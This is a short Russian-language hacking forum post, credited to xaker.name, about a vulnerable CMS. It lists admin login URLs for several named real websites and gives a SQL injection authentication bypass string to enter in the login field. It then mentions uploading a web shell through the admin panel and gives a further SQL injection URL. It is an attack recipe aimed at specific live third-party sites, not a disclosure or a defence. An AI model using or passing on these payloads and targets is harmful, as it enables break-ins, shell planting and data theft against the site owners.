Пример того, как не стоит делать CMS.
Офф. сайт - http://ruswebdesign.ru/, причем у них эта CMS не стоит, боятся видимо юзать.
Пример: http://www.alpgalka.ru/admin/
Достаточно ввести в поле логин
' or 1/* и нажать Войти. В админке очень удобно загружать шелл.
Ну и sql-инъекции типа http://www.alpgalka.ru/?page_id=4'
http://www.microplasma.ru/admin/
http://www.akabel.ru/admin/
http://www.eurovolga.ru/admin/
© xaker.name